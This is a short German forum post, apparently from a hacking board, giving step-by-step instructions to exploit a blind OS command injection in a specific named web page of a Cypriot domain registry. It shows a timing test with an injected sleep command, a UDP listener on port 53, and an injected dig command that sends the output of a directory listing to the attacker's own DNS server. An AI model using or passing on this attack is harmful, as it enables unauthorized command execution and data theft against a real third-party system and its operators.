Keine Antworten in diesem Thema

[Zero-X]

URL:

http://www.nic.cy/nslookup/online_database.htm

Hier ist eine Blind OS Command Injection. Das heist, daß Systembefehle zwar ausgeführt werden aber man die Ausgabe nicht sieht.
Gibt man jetzt im Eingabefeld ";sleep 10;" ein, stellt man fest, daß das Skript deutlich länger zur Ausführung braucht (10 Sekunden).

Jetzt brauchen wir einen Server, der alle Daten protokolliert, die an ihn gesendet werden.
Ich nehme dazu immer den hier:

Please Login HERE or Register HERE to see this link!

In der Kommandozeile von Windows führen wir den Server folgendermasen aus:

echotool /p udp /s 53 /r 53 /l 53

Port 53 ist der DNS-Port wo wir gleich unsere Daten vom Target-Host senden.

Bei der oben genannten URL geben wir im Eingabefeld ein (Es muss eine IPV4 Adresse sein):

;dig @deine_IP $(ls /);

"dig" ist ein Befehl um sich Infos zu einer Domain oder IP anzuzeigen mit "@deine_IP" geben wir den gewünschten DNS-Server an. In diesem Fall den eigenen Server an den wir die Daten senden.
Wenn alles geklappt hat, sehen wir im Fenster mit der Kommandozeile die Ausgabe des Befehls "ls /".